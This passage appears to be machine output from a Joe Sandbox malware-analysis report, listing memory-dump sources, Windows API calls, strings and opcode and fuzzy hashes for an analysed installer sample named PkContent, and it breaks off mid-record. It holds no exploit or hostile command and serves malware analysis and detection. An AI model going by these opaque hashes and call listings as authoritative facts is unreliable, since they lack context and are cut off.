                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                      • String ID: CopyFiles "%s"->"%s"
                                                      • API String ID: 2577523808-3778932970
                                                      • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                      • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                      • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                      • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: lstrcatwsprintf
                                                      • String ID: %02x%c$...
                                                      • API String ID: 3065427908-1057055748
                                                      • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                      • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                      • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                      • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                      APIs
                                                      • OleInitialize.OLE32(00000000), ref: 00405057
                                                        • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                      • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                      • String ID: Section: "%s"$Skipping section: "%s"
                                                      • API String ID: 2266616436-4211696005
                                                      • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                      • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                      • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                      • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                      APIs
                                                      • GetDC.USER32(?), ref: 00402100
                                                      • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                        • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                      • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                        • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                      • String ID:
                                                      • API String ID: 1599320355-0
                                                      • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                      • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                      • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                      • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                      APIs
                                                        • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                      • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                      • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                      • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: lstrcpyn$CreateFilelstrcmp
                                                      • String ID: Version
                                                      • API String ID: 512980652-315105994
                                                      • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                      • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                      • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                      • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                      APIs
                                                      • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                      • GetTickCount.KERNEL32 ref: 00403303
                                                      • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                      • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                      • String ID:
                                                      • API String ID: 2102729457-0
                                                      • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                      • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                      • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                      • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                      APIs
                                                      • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                      • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                      • String ID:
                                                      • API String ID: 2883127279-0
                                                      • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                      • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                      • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                      • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                      APIs
                                                      • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                      • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfileStringlstrcmp
                                                      • String ID: !N~
                                                      • API String ID: 623250636-529124213
                                                      • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                      • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                      • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                      • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                      APIs
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                      • CloseHandle.KERNEL32(?), ref: 00405C71
                                                      Strings
                                                      • Error launching installer, xrefs: 00405C48
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateHandleProcess
                                                      • String ID: Error launching installer
                                                      • API String ID: 3712363035-66219284
                                                      • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                      • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                      • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                      • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                      APIs
                                                      • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                      • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                        • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: CloseHandlelstrlenwvsprintf
                                                      • String ID: RMDir: RemoveDirectory invalid input("")
                                                      • API String ID: 3509786178-2769509956
                                                      • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                      • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                      • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                      • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                      APIs
                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                      • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                      • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                      • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                      • String ID:
                                                      • API String ID: 190613189-0
                                                      • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                      • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
